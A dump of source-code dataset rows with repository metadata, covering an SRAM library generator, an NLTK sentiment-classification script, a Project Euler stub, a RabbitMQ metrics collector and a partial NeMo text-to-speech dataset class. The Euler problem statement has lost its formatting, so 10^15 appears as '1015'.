self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
return ExtraLibrary(prefix=None, library=Library(
name=sram_name,
nldm_liberty_file=lib_path,
lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
spice_file="{b}/{n}/{n}.lvs.sp".format(b=base_dir,n=sram_name),
verilog_sim="{b}/{n}/{n}.v".format(b=base_dir,n=sram_name),
corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
provides=[{'lib_type': "sram", 'vt': params.vt}]))
else:
self.logger.error("SKY130 SRAM cache does not support family:{f}".format(f=params.family))
return ExtraLibrary(prefix=None, library=None)
tool=SKY130SRAMGenerator | en | 0.421453 | # Run generator for a single sram and corner #TODO: this is really an abuse of the corner stuff # Different target memories based on port count # if params.family == "1rw": # self.logger.info("Compiling 1rw memories to DFFRAM instances") # base_dir = self.get_setting("technology.sky130.dffram_lib") # fam_code = params.family # sram_name = "RAM{d}x{w}".format( # d=params.depth, # w=params.width) # #TODO: need real libs (perhaps run Liberate here?) # #For now, use the dummy lib for all corners # corner_str = "" # # lib_path = "{b}/{n}.lib".format( # b=base_dir, # n=sram_name) # if not os.path.exists(lib_path): # self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str)) # return ExtraLibrary(prefix=None, library=Library( # name=sram_name, # nldm_liberty_file=lib_path, # lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name), # #TODO: GDS not generated. Unclear which DEF to use? # #gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name), # spice_file="{b}/{n}/{n}.spice".format(b=base_dir,n=sram_name), # #TODO: Will not work as-is for behav. sim (this is a structural netlist referencing std. cells) # #Need to add std cell behavioral Verilog to sim.inputs.input_files # verilog_sim="{b}/{n}/{n}.nl.v".format(b=base_dir,n=sram_name), # corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"}, # supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"}, # provides=[{'lib_type': "sram", 'vt': params.vt}])) # elif params.family == "1rw1r": # size in kiB #TODO: Hammer SRAMParameters doesn't have this info #TODO: replace this if OpenRAM characterization done for other corners #For now, use typical lib for all corners #corner_str = "{speed}_{volt}V_{temp}C".format( # speed = speed, # volt = str(corner.voltage.value_in_units("V")).replace(".","p"), # temp = str(int(corner.temp.value_in_units("C"))).replace(".","p")) | 2.26909 | 2 |
Section 4/nlp-4-ngrams.py | PacktPublishing/Hands-on-NLP-with-NLTK-and-scikit-learn- | 34 | 8085 | import collections
import nltk
import os
from sklearn import (
datasets, model_selection, feature_extraction, linear_model, naive_bayes,
ensemble
)
def extract_features(corpus):
'''Extract TF-IDF features from corpus'''
sa_stop_words = nltk.corpus.stopwords.words("english")
# words that might invert a sentence's meaning
white_list = [
'what', 'but', 'if', 'because', 'as', 'until', 'against',
'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again',
'further', 'then', 'once', 'here', 'there', 'why', 'how', 'all', 'any',
'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only', 'own',
'same', 'so', 'than', 'too', 'can', 'will', 'just', 'don', 'should']
# take these out of the standard NLTK stop word list
sa_stop_words = [sw for sw in sa_stop_words if sw not in white_list]
# vectorize means we turn non-numerical data into an array of numbers
count_vectorizer = feature_extraction.text.CountVectorizer(
lowercase=True, # for demonstration, True by default
tokenizer=nltk.word_tokenize, # use the NLTK tokenizer
min_df=2, # minimum document frequency, i.e. the word must appear more than once.
ngram_range=(1, 2),
stop_words=sa_stop_words
)
processed_corpus = count_vectorizer.fit_transform(corpus)
processed_corpus = feature_extraction.text.TfidfTransformer().fit_transform(
processed_corpus)
return processed_corpus
data_directory = 'movie_reviews'
movie_sentiment_data = datasets.load_files(data_directory, shuffle=True)
print('{} files loaded.'.format(len(movie_sentiment_data.data)))
print('They contain the following classes: {}.'.format(
movie_sentiment_data.target_names))
movie_tfidf = extract_features(movie_sentiment_data.data)
X_train, X_test, y_train, y_test = model_selection.train_test_split(
movie_tfidf, movie_sentiment_data.target, test_size=0.30, random_state=42)
# similar to nltk.NaiveBayesClassifier.train()
clf1 = linear_model.LogisticRegression()
clf1.fit(X_train, y_train)
print('Logistic Regression performance: {}'.format(clf1.score(X_test, y_test)))
clf2 = linear_model.SGDClassifier()
clf2.fit(X_train, y_train)
print('SGDClassifier performance: {}'.format(clf2.score(X_test, y_test)))
clf3 = naive_bayes.MultinomialNB()
clf3.fit(X_train, y_train)
print('MultinomialNB performance: {}'.format(clf3.score(X_test, y_test)))
clf4 = naive_bayes.BernoulliNB()
clf4.fit(X_train, y_train)
print('BernoulliNB performance: {}'.format(clf4.score(X_test, y_test)))
voting_model = ensemble.VotingClassifier(
estimators=[('lr', clf1), ('sgd', clf2), ('mnb', clf3), ('bnb', clf4)],
voting='hard')
voting_model.fit(X_train, y_train)
print('Voting classifier performance: {}'.format(
voting_model.score(X_test, y_test)))
| import collections
import nltk
import os
from sklearn import (
datasets, model_selection, feature_extraction, linear_model, naive_bayes,
ensemble
)
def extract_features(corpus):
'''Extract TF-IDF features from corpus'''
sa_stop_words = nltk.corpus.stopwords.words("english")
# words that might invert a sentence's meaning
white_list = [
'what', 'but', 'if', 'because', 'as', 'until', 'against',
'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again',
'further', 'then', 'once', 'here', 'there', 'why', 'how', 'all', 'any',
'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only', 'own',
'same', 'so', 'than', 'too', 'can', 'will', 'just', 'don', 'should']
# take these out of the standard NLTK stop word list
sa_stop_words = [sw for sw in sa_stop_words if sw not in white_list]
# vectorize means we turn non-numerical data into an array of numbers
count_vectorizer = feature_extraction.text.CountVectorizer(
lowercase=True, # for demonstration, True by default
tokenizer=nltk.word_tokenize, # use the NLTK tokenizer
min_df=2, # minimum document frequency, i.e. the word must appear more than once.
ngram_range=(1, 2),
stop_words=sa_stop_words
)
processed_corpus = count_vectorizer.fit_transform(corpus)
processed_corpus = feature_extraction.text.TfidfTransformer().fit_transform(
processed_corpus)
return processed_corpus
data_directory = 'movie_reviews'
movie_sentiment_data = datasets.load_files(data_directory, shuffle=True)
print('{} files loaded.'.format(len(movie_sentiment_data.data)))
print('They contain the following classes: {}.'.format(
movie_sentiment_data.target_names))
movie_tfidf = extract_features(movie_sentiment_data.data)
X_train, X_test, y_train, y_test = model_selection.train_test_split(
movie_tfidf, movie_sentiment_data.target, test_size=0.30, random_state=42)
# similar to nltk.NaiveBayesClassifier.train()
clf1 = linear_model.LogisticRegression()
clf1.fit(X_train, y_train)
print('Logistic Regression performance: {}'.format(clf1.score(X_test, y_test)))
clf2 = linear_model.SGDClassifier()
clf2.fit(X_train, y_train)
print('SGDClassifier performance: {}'.format(clf2.score(X_test, y_test)))
clf3 = naive_bayes.MultinomialNB()
clf3.fit(X_train, y_train)
print('MultinomialNB performance: {}'.format(clf3.score(X_test, y_test)))
clf4 = naive_bayes.BernoulliNB()
clf4.fit(X_train, y_train)
print('BernoulliNB performance: {}'.format(clf4.score(X_test, y_test)))
voting_model = ensemble.VotingClassifier(
estimators=[('lr', clf1), ('sgd', clf2), ('mnb', clf3), ('bnb', clf4)],
voting='hard')
voting_model.fit(X_train, y_train)
print('Voting classifier performance: {}'.format(
voting_model.score(X_test, y_test)))
| en | 0.838862 | Extract TF-IDF features from corpus # words that might invert a sentence's meaning # take these out of the standard NLTK stop word list # vectorize means we turn non-numerical data into an array of numbers # for demonstration, True by default # use the NLTK tokenizer # minimum document frequency, i.e. the word must appear more than once. # similar to nltk.NaiveBayesClassifier.train() | 3.327625 | 3 |
code/gcd_sequence/sol_443.py | bhavinjawade/project-euler-solutions | 2 | 8086 | <reponame>bhavinjawade/project-euler-solutions
# -*- coding: utf-8 -*-
'''
File name: code\gcd_sequence\sol_443.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #443 :: GCD sequence
#
# For more information see:
# https://projecteuler.net/problem=443
# Problem Statement
'''
Let g(n) be a sequence defined as follows:
g(4) = 13,
g(n) = g(n-1) + gcd(n, g(n-1)) for n > 4.
The first few values are:
n4567891011121314151617181920...
g(n)1314161718272829303132333451545560...
You are given that g(1 000) = 2524 and g(1 000 000) = 2624152.
Find g(1015).
'''
# Solution
# Solution Approach
'''
'''
| # -*- coding: utf-8 -*-
'''
File name: code\gcd_sequence\sol_443.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #443 :: GCD sequence
#
# For more information see:
# https://projecteuler.net/problem=443
# Problem Statement
'''
Let g(n) be a sequence defined as follows:
g(4) = 13,
g(n) = g(n-1) + gcd(n, g(n-1)) for n > 4.
The first few values are:
n4567891011121314151617181920...
g(n)1314161718272829303132333451545560...
You are given that g(1 000) = 2524 and g(1 000 000) = 2624152.
Find g(1015).
'''
# Solution
# Solution Approach
'''
''' | en | 0.622069 | # -*- coding: utf-8 -*- File name: code\gcd_sequence\sol_443.py Author: <NAME> Date created: Oct 20, 2018 Python Version: 3.x # Solution to Project Euler Problem #443 :: GCD sequence # # For more information see: # https://projecteuler.net/problem=443 # Problem Statement Let g(n) be a sequence defined as follows: g(4) = 13, g(n) = g(n-1) + gcd(n, g(n-1)) for n > 4. The first few values are: n4567891011121314151617181920... g(n)1314161718272829303132333451545560... You are given that g(1 000) = 2524 and g(1 000 000) = 2624152. Find g(1015). # Solution # Solution Approach | 3.370621 | 3 |
src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 0 | 8087 | <filename>src/collectors/rabbitmq/rabbitmq.py
# coding=utf-8
"""
Collects data from RabbitMQ through the admin interface
#### Notes
* if two vhosts have the queues with the same name, the metrics will collide
#### Dependencies
* pyrabbit
"""
import diamond.collector
try:
from numbers import Number
Number # workaround for pyflakes issue #13
import pyrabbit.api
except ImportError:
Number = None
class RabbitMQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(RabbitMQCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname and port to collect from',
'user': 'Username',
'password': 'Password',
'queues': 'Queues to publish. Leave empty to publish all.',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(RabbitMQCollector, self).get_default_config()
config.update({
'path': 'rabbitmq',
'host': 'localhost:55672',
'user': 'guest',
'password': '<PASSWORD>',
})
return config
def collect(self):
if Number is None:
self.log.error('Unable to import either Number or pyrabbit.api')
return {}
queues = []
if 'queues' in self.config:
queues = self.config['queues'].split()
try:
client = pyrabbit.api.Client(self.config['host'],
self.config['user'],
self.config['password'])
for queue in client.get_queues():
# skip queues we don't want to publish
if queues and queue['name'] not in queues:
continue
for key in queue:
name = '{0}.{1}'.format('queues', queue['name'])
self._publish_metrics(name, [], key, queue)
overview = client.get_overview()
for key in overview:
self._publish_metrics('', [], key, overview)
except Exception, e:
self.log.error('Couldnt connect to rabbitmq %s', e)
return {}
def _publish_metrics(self, name, prev_keys, key, data):
"""Recursively publish keys"""
value = data[key]
keys = prev_keys + [key]
if isinstance(value, dict):
for new_key in value:
self._publish_metrics(name, keys, new_key, value)
elif isinstance(value, Number):
joined_keys = '.'.join(keys)
if name:
publish_key = '{0}.{1}'.format(name, joined_keys)
else:
publish_key = joined_keys
self.publish(publish_key, value)
| <filename>src/collectors/rabbitmq/rabbitmq.py
# coding=utf-8
"""
Collects data from RabbitMQ through the admin interface
#### Notes
* if two vhosts have the queues with the same name, the metrics will collide
#### Dependencies
* pyrabbit
"""
import diamond.collector
try:
from numbers import Number
Number # workaround for pyflakes issue #13
import pyrabbit.api
except ImportError:
Number = None
class RabbitMQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(RabbitMQCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname and port to collect from',
'user': 'Username',
'password': 'Password',
'queues': 'Queues to publish. Leave empty to publish all.',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(RabbitMQCollector, self).get_default_config()
config.update({
'path': 'rabbitmq',
'host': 'localhost:55672',
'user': 'guest',
'password': '<PASSWORD>',
})
return config
def collect(self):
if Number is None:
self.log.error('Unable to import either Number or pyrabbit.api')
return {}
queues = []
if 'queues' in self.config:
queues = self.config['queues'].split()
try:
client = pyrabbit.api.Client(self.config['host'],
self.config['user'],
self.config['password'])
for queue in client.get_queues():
# skip queues we don't want to publish
if queues and queue['name'] not in queues:
continue
for key in queue:
name = '{0}.{1}'.format('queues', queue['name'])
self._publish_metrics(name, [], key, queue)
overview = client.get_overview()
for key in overview:
self._publish_metrics('', [], key, overview)
except Exception, e:
self.log.error('Couldnt connect to rabbitmq %s', e)
return {}
def _publish_metrics(self, name, prev_keys, key, data):
"""Recursively publish keys"""
value = data[key]
keys = prev_keys + [key]
if isinstance(value, dict):
for new_key in value:
self._publish_metrics(name, keys, new_key, value)
elif isinstance(value, Number):
joined_keys = '.'.join(keys)
if name:
publish_key = '{0}.{1}'.format(name, joined_keys)
else:
publish_key = joined_keys
self.publish(publish_key, value)
| en | 0.765086 | # coding=utf-8 Collects data from RabbitMQ through the admin interface #### Notes * if two vhosts have the queues with the same name, the metrics will collide #### Dependencies * pyrabbit # workaround for pyflakes issue #13 Returns the default collector settings # skip queues we don't want to publish Recursively publish keys | 2.188792 | 2 |
nemo/collections/tts/torch/data.py | MalikIdreesHasanKhan/NeMo | 4,145 | 8088 | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pickle
from pathlib import Path
from typing import Callable, Dict, List, Optional, Union
import librosa
import torch
from nemo_text_processing.text_normalization.normalize import Normalizer
from tqdm import tqdm
from nemo.collections.asr.parts.preprocessing.features import WaveformFeaturizer
from nemo.collections.tts.torch.helpers import (
BetaBinomialInterpolator,
beta_binomial_prior_distribution,
general_padding,
)
from nemo.collections.tts.torch.tts_data_types import (
DATA_STR2DATA_CLASS,
MAIN_DATA_TYPES,
VALID_SUPPLEMENTARY_DATA_TYPES,
DurationPrior,
Durations,
Energy,
LMTokens,
LogMel,
Pitch,
SpeakerID,
WithLens,
)
from nemo.collections.tts.torch.tts_tokenizers import BaseTokenizer, EnglishCharsTokenizer, EnglishPhonemesTokenizer
from nemo.core.classes import Dataset
from nemo.utils import logging
class TTSDataset(Dataset):
def __init__(
self,
manifest_filepath: str,
sample_rate: int,
text_tokenizer: Union[BaseTokenizer, Callable[[str], List[int]]],
tokens: Optional[List[str]] = None,
text_normalizer: Optional[Union[Normalizer, Callable[[str], str]]] = None,
text_normalizer_call_args: Optional[Dict] = None,
text_tokenizer_pad_id: Optional[int] = None,
sup_data_types: Optional[List[str]] = None,
sup_data_path: Optional[Union[Path, str]] = None,
max_duration: Optional[float] = None,
min_duration: Optional[float] = None,
ignore_file: Optional[str] = None,
trim: bool = False,
n_fft=1024,
win_length=None,
hop_length=None,
window="hann",
n_mels=80,
lowfreq=0,
highfreq=None,
**kwargs,
):
"""Dataset that loads main data types (audio and text) and specified supplementary data types (e.g. log mel, durations, pitch).
Most supplementary data types will be computed on the fly and saved in the supplementary_folder if they did not exist before.
Arguments for supplementary data should be also specified in this class and they will be used from kwargs (see keyword args section).
Args:
manifest_filepath (str, Path, List[str, Path]): Path(s) to the .json manifests containing information on the
dataset. Each line in the .json file should be valid json. Note: the .json file itself is not valid
json. Each line should contain the following:
"audio_filepath": <PATH_TO_WAV>
"mel_filepath": <PATH_TO_LOG_MEL_PT> (Optional)
"duration": <Duration of audio clip in seconds> (Optional)
"text": <THE_TRANSCRIPT> (Optional)
sample_rate (int): The sample rate of the audio. Or the sample rate that we will resample all files to.
text_tokenizer (Optional[Union[BaseTokenizer, Callable[[str], List[int]]]]): BaseTokenizer or callable which represents text tokenizer.
tokens (Optional[List[str]]): Tokens from text_tokenizer. Should be specified if text_tokenizer is not BaseTokenizer.
text_normalizer (Optional[Union[Normalizer, Callable[[str], str]]]): Normalizer or callable which represents text normalizer.
text_normalizer_call_args (Optional[Dict]): Additional arguments for text_normalizer function.
text_tokenizer_pad_id (Optional[int]): Index of padding. Should be specified if text_tokenizer is not BaseTokenizer.
sup_data_types (Optional[List[str]]): List of supplementary data types.
sup_data_path (Optional[Union[Path, str]]): A folder that contains or will contain supplementary data (e.g. pitch).
max_duration (Optional[float]): Max duration of audio clips in seconds. All samples exceeding this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
min_duration (Optional[float]): Min duration of audio clips in seconds. All samples lower than this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
ignore_file (Optional[str, Path]): The location of a pickle-saved list of audio_ids (the stem of the audio
files) that will be pruned prior to training. Defaults to None which does not prune.
trim (Optional[bool]): Whether to apply librosa.effects.trim to the audio file. Defaults to False.
n_fft (Optional[int]): The number of fft samples. Defaults to 1024
win_length (Optional[int]): The length of the stft windows. Defaults to None which uses n_fft.
hop_length (Optional[int]): The hope length between fft computations. Defaults to None which uses n_fft//4.
window (Optional[str]): One of 'hann', 'hamming', 'blackman','bartlett', 'none'. Which corresponds to the
equivalent torch window function.
n_mels (Optional[int]): The number of mel filters. Defaults to 80.
lowfreq (Optional[int]): The lowfreq input to the mel filter calculation. Defaults to 0.
highfreq (Optional[int]): The highfreq input to the mel filter calculation. Defaults to None.
Keyword Args:
durs_file (Optional[str]): String path to pickled durations location.
durs_type (Optional[str]): Type of durations. Currently supported only "aligned-based".
use_beta_binomial_interpolator (Optional[bool]): Whether to use beta-binomial interpolator. Defaults to False.
pitch_fmin (Optional[float]): The fmin input to librosa.pyin. Defaults to librosa.note_to_hz('C2').
pitch_fmax (Optional[float]): The fmax input to librosa.pyin. Defaults to librosa.note_to_hz('C7').
pitch_avg (Optional[float]): The mean that we use to normalize the pitch.
pitch_std (Optional[float]): The std that we use to normalize the pitch.
pitch_norm (Optional[bool]): Whether to normalize pitch (via pitch_avg and pitch_std) or not.
"""
super().__init__()
self.text_normalizer = text_normalizer
self.text_normalizer_call = (
self.text_normalizer.normalize if isinstance(self.text_normalizer, Normalizer) else self.text_normalizer
)
self.text_normalizer_call_args = text_normalizer_call_args if text_normalizer_call_args is not None else {}
self.text_tokenizer = text_tokenizer
if isinstance(self.text_tokenizer, BaseTokenizer):
self.text_tokenizer_pad_id = text_tokenizer.pad
self.tokens = text_tokenizer.tokens
else:
if text_tokenizer_pad_id is None:
raise ValueError(f"text_tokenizer_pad_id must be specified if text_tokenizer is not BaseTokenizer")
if tokens is None:
raise ValueError(f"tokens must be specified if text_tokenizer is not BaseTokenizer")
self.text_tokenizer_pad_id = text_tokenizer_pad_id
self.tokens = tokens
if isinstance(manifest_filepath, str):
manifest_filepath = [manifest_filepath]
self.manifest_filepath = manifest_filepath
if sup_data_path is not None:
Path(sup_data_path).mkdir(parents=True, exist_ok=True)
self.sup_data_path = sup_data_path
self.sup_data_types = (
[DATA_STR2DATA_CLASS[d_as_str] for d_as_str in sup_data_types] if sup_data_types is not None else []
)
self.sup_data_types_set = set(self.sup_data_types)
self.data = []
audio_files = []
total_duration = 0
for manifest_file in self.manifest_filepath:
with open(Path(manifest_file).expanduser(), 'r') as f:
logging.info(f"Loading dataset from {manifest_file}.")
for line in tqdm(f):
item = json.loads(line)
file_info = {
"audio_filepath": item["audio_filepath"],
"mel_filepath": item["mel_filepath"] if "mel_filepath" in item else None,
"duration": item["duration"] if "duration" in item else None,
"text_tokens": None,
"speaker_id": item["speaker"] if "speaker" in item else None,
}
if "text" in item:
text = item["text"]
if self.text_normalizer is not None:
text = self.text_normalizer_call(text, **self.text_normalizer_call_args)
text_tokens = self.text_tokenizer(text)
file_info["raw_text"] = item["text"]
file_info["text_tokens"] = text_tokens
audio_files.append(file_info)
if file_info["duration"] is None:
logging.info(
"Not all audio files have duration information. Duration logging will be disabled."
)
total_duration = None
if total_duration is not None:
total_duration += item["duration"]
logging.info(f"Loaded dataset with {len(audio_files)} files.")
if total_duration is not None:
logging.info(f"Dataset contains {total_duration / 3600:.2f} hours.")
if ignore_file:
logging.info(f"using {ignore_file} to prune dataset.")
with open(Path(ignore_file).expanduser(), "rb") as f:
wavs_to_ignore = set(pickle.load(f))
pruned_duration = 0 if total_duration is not None else None
pruned_items = 0
for item in audio_files:
audio_path = item['audio_filepath']
audio_id = Path(audio_path).stem
# Prune data according to min/max_duration & the ignore file
if total_duration is not None:
if (min_duration and item["duration"] < min_duration) or (
max_duration and item["duration"] > max_duration
):
pruned_duration += item["duration"]
pruned_items += 1
continue
if ignore_file and (audio_id in wavs_to_ignore):
pruned_items += 1
pruned_duration += item["duration"]
wavs_to_ignore.remove(audio_id)
continue
self.data.append(item)
logging.info(f"Pruned {pruned_items} files. Final dataset contains {len(self.data)} files")
if pruned_duration is not None:
logging.info(
f"Pruned {pruned_duration / 3600:.2f} hours. Final dataset contains "
f"{(total_duration - pruned_duration) / 3600:.2f} hours."
)
self.sample_rate = sample_rate
self.featurizer = WaveformFeaturizer(sample_rate=self.sample_rate)
self.trim = trim
self.n_fft = n_fft
self.n_mels = n_mels
self.lowfreq = lowfreq
self.highfreq = highfreq
self.window = window
self.win_length = win_length or self.n_fft
self.hop_length = hop_length
self.hop_len = self.hop_length or self.n_fft // 4
self.fb = torch.tensor(
librosa.filters.mel(
self.sample_rate, self.n_fft, n_mels=self.n_mels, fmin=self.lowfreq, fmax=self.highfreq
),
dtype=torch.float,
).unsqueeze(0)
window_fn = {
'hann': torch.hann_window,
'hamming': torch.hamming_window,
'blackman': torch.blackman_window,
'bartlett': torch.bartlett_window,
'none': None,
}.get(self.window, None)
self.stft = lambda x: torch.stft(
input=x,
n_fft=self.n_fft,
hop_length=self.hop_len,
win_length=self.win_length,
window=window_fn(self.win_length, periodic=False).to(torch.float) if window_fn else None,
)
for data_type in self.sup_data_types:
if data_type not in VALID_SUPPLEMENTARY_DATA_TYPES:
raise NotImplementedError(f"Current implementation of TTSDataset doesn't support {data_type} type.")
getattr(self, f"add_{data_type.name}")(**kwargs)
def add_log_mel(self, **kwargs):
pass
def add_durations(self, **kwargs):
durs_file = kwargs.pop('durs_file')
durs_type = kwargs.pop('durs_type')
audio_stem2durs = torch.load(durs_file)
self.durs = []
for tag in [Path(d["audio_filepath"]).stem for d in self.data]:
durs = audio_stem2durs[tag]
if durs_type == "aligner-based":
self.durs.append(durs)
else:
raise NotImplementedError(
f"{durs_type} duration type is not supported. Only align-based is supported at this moment."
)
def add_duration_prior(self, **kwargs):
self.use_beta_binomial_interpolator = kwargs.pop('use_beta_binomial_interpolator', False)
if self.use_beta_binomial_interpolator:
self.beta_binomial_interpolator = BetaBinomialInterpolator()
def add_pitch(self, **kwargs):
self.pitch_fmin = kwargs.pop("pitch_fmin", librosa.note_to_hz('C2'))
self.pitch_fmax = kwargs.pop("pitch_fmax", librosa.note_to_hz('C7'))
self.pitch_avg = kwargs.pop("pitch_avg", None)
self.pitch_std = kwargs.pop("pitch_std", None)
self.pitch_norm = kwargs.pop("pitch_norm", False)
def add_energy(self, **kwargs):
pass
def add_speaker_id(self, **kwargs):
pass
def get_spec(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.stft(audio)
if spec.dtype in [torch.cfloat, torch.cdouble]:
spec = torch.view_as_real(spec)
spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-9)
return spec
def get_log_mel(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.get_spec(audio)
mel = torch.matmul(self.fb.to(spec.dtype), spec)
log_mel = torch.log(torch.clamp(mel, min=torch.finfo(mel.dtype).tiny))
return log_mel
def __getitem__(self, index):
sample = self.data[index]
audio_stem = Path(sample["audio_filepath"]).stem
features = self.featurizer.process(sample["audio_filepath"], trim=self.trim)
audio, audio_length = features, torch.tensor(features.shape[0]).long()
text = torch.tensor(sample["text_tokens"]).long()
text_length = torch.tensor(len(sample["text_tokens"])).long()
log_mel, log_mel_length = None, None
if LogMel in self.sup_data_types_set:
mel_path = sample["mel_filepath"]
if mel_path is not None and Path(mel_path).exists():
log_mel = torch.load(mel_path)
else:
mel_path = Path(self.sup_data_path) / f"mel_{audio_stem}.pt"
if mel_path.exists():
log_mel = torch.load(mel_path)
else:
log_mel = self.get_log_mel(audio)
torch.save(log_mel, mel_path)
log_mel = log_mel.squeeze(0)
log_mel_length = torch.tensor(log_mel.shape[1]).long()
durations = None
if Durations in self.sup_data_types_set:
durations = self.durs[index]
duration_prior = None
if DurationPrior in self.sup_data_types_set:
if self.use_beta_binomial_interpolator:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = torch.from_numpy(self.beta_binomial_interpolator(mel_len, text_length.item()))
else:
prior_path = Path(self.sup_data_path) / f"pr_{audio_stem}.pt"
if prior_path.exists():
duration_prior = torch.load(prior_path)
else:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = beta_binomial_prior_distribution(text_length, mel_len)
duration_prior = torch.from_numpy(duration_prior)
torch.save(duration_prior, prior_path)
pitch, pitch_length = None, None
if Pitch in self.sup_data_types_set:
pitch_name = (
f"{audio_stem}_pitch_pyin_"
f"fmin{self.pitch_fmin}_fmax{self.pitch_fmax}_"
f"fl{self.win_length}_hs{self.hop_len}.pt"
)
pitch_path = Path(self.sup_data_path) / pitch_name
if pitch_path.exists():
pitch = torch.load(pitch_path).float()
else:
pitch, _, _ = librosa.pyin(
audio.numpy(),
fmin=self.pitch_fmin,
fmax=self.pitch_fmax,
frame_length=self.win_length,
sr=self.sample_rate,
fill_na=0.0,
)
pitch = torch.from_numpy(pitch).float()
torch.save(pitch, pitch_path)
if self.pitch_avg is not None and self.pitch_std is not None and self.pitch_norm:
pitch -= self.pitch_avg
pitch[pitch == -self.pitch_avg] = 0.0 # Zero out values that were perviously zero
pitch /= self.pitch_std
pitch_length = torch.tensor(len(pitch)).long()
energy, energy_length = None, None
if Energy in self.sup_data_types_set:
energy_path = Path(self.sup_data_path) / f"{audio_stem}_energy_wl{self.win_length}_hs{self.hop_len}.pt"
if energy_path.exists():
energy = torch.load(energy_path).float()
else:
spec = self.get_spec(audio)
energy = torch.linalg.norm(spec.squeeze(0), axis=0).float()
torch.save(energy, energy_path)
energy_length = torch.tensor(len(energy)).long()
speaker_id = None
if SpeakerID in self.sup_data_types_set:
speaker_id = torch.tensor(sample["speaker_id"]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
)
def __len__(self):
return len(self.data)
def join_data(self, data_dict):
result = []
for data_type in MAIN_DATA_TYPES + self.sup_data_types:
result.append(data_dict[data_type.name])
if issubclass(data_type, WithLens):
result.append(data_dict[f"{data_type.name}_lens"])
return tuple(result)
def general_collate_fn(self, batch):
(
_,
audio_lengths,
_,
tokens_lengths,
_,
log_mel_lengths,
durations_list,
duration_priors_list,
pitches,
pitches_lengths,
energies,
energies_lengths,
_,
) = zip(*batch)
max_audio_len = max(audio_lengths).item()
max_tokens_len = max(tokens_lengths).item()
max_log_mel_len = max(log_mel_lengths) if LogMel in self.sup_data_types_set else None
max_durations_len = max([len(i) for i in durations_list]) if Durations in self.sup_data_types_set else None
max_pitches_len = max(pitches_lengths).item() if Pitch in self.sup_data_types_set else None
max_energies_len = max(energies_lengths).item() if Energy in self.sup_data_types_set else None
if LogMel in self.sup_data_types_set:
log_mel_pad = torch.finfo(batch[0][2].dtype).tiny
duration_priors = (
torch.zeros(
len(duration_priors_list),
max([prior_i.shape[0] for prior_i in duration_priors_list]),
max([prior_i.shape[1] for prior_i in duration_priors_list]),
)
if DurationPrior in self.sup_data_types_set
else []
)
audios, tokens, log_mels, durations_list, pitches, energies, speaker_ids = [], [], [], [], [], [], []
for i, sample_tuple in enumerate(batch):
(
audio,
audio_len,
token,
token_len,
log_mel,
log_mel_len,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = sample_tuple
audio = general_padding(audio, audio_len.item(), max_audio_len)
audios.append(audio)
token = general_padding(token, token_len.item(), max_tokens_len, pad_value=self.text_tokenizer_pad_id)
tokens.append(token)
if LogMel in self.sup_data_types_set:
log_mels.append(general_padding(log_mel, log_mel_len, max_log_mel_len, pad_value=log_mel_pad))
if Durations in self.sup_data_types_set:
durations_list.append(general_padding(durations, len(durations), max_durations_len))
if DurationPrior in self.sup_data_types_set:
duration_priors[i, : duration_prior.shape[0], : duration_prior.shape[1]] = duration_prior
if Pitch in self.sup_data_types_set:
pitches.append(general_padding(pitch, pitch_length.item(), max_pitches_len))
if Energy in self.sup_data_types_set:
energies.append(general_padding(energy, energy_length.item(), max_energies_len))
if SpeakerID in self.sup_data_types_set:
speaker_ids.append(speaker_id)
data_dict = {
"audio": torch.stack(audios),
"audio_lens": torch.stack(audio_lengths),
"text": torch.stack(tokens),
"text_lens": torch.stack(tokens_lengths),
"log_mel": torch.stack(log_mels) if LogMel in self.sup_data_types_set else None,
"log_mel_lens": torch.stack(log_mel_lengths) if LogMel in self.sup_data_types_set else None,
"durations": torch.stack(durations_list) if Durations in self.sup_data_types_set else None,
